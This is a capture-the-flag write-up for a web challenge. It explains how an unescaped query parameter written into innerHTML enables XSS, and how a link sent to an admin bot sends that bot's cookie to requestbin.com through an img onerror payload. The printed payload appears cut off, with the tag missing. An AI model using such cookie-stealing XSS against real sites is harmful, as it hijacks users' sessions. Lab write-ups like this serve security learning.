# Query Service

We can run queries against an SQL server. We have no info on the sql server though. Queries like `CREATE TABLE mytable (column1 int); INSERT INTO mytable (column1) VALUES (7); SELECT * FROM mytable;` work without error. The query is basically just appended as a url parameter in the get request.

Notice that when sending a query, a fetch to sql.db is made which fetches a .db file. The file reveals infos about a `notes` table. `SELECT * FROM notes` reveals:
```
submit link to admin bot at http://webp.bcactf.com:49155/
the flag is in the bot's "flag" cookie
```

The javascript of the page contains the following:
```typescript
if (searchParams.get("query")) {
let query = searchParams.get("query");
linkdiv.innerHTML = "Link to this query: (link)";
```

This looks like XSS is possible by sending a malicious "query link" to the admin.

After tampering with the query parameter for a while and using https://requestbin.com/, I was able to get the admin cookie with an img tag and an onerror attribute:
`CREATE TABLE mytable (column1 int);">`

Sending the link to the admin reveals the flag on https://requestbin.com/.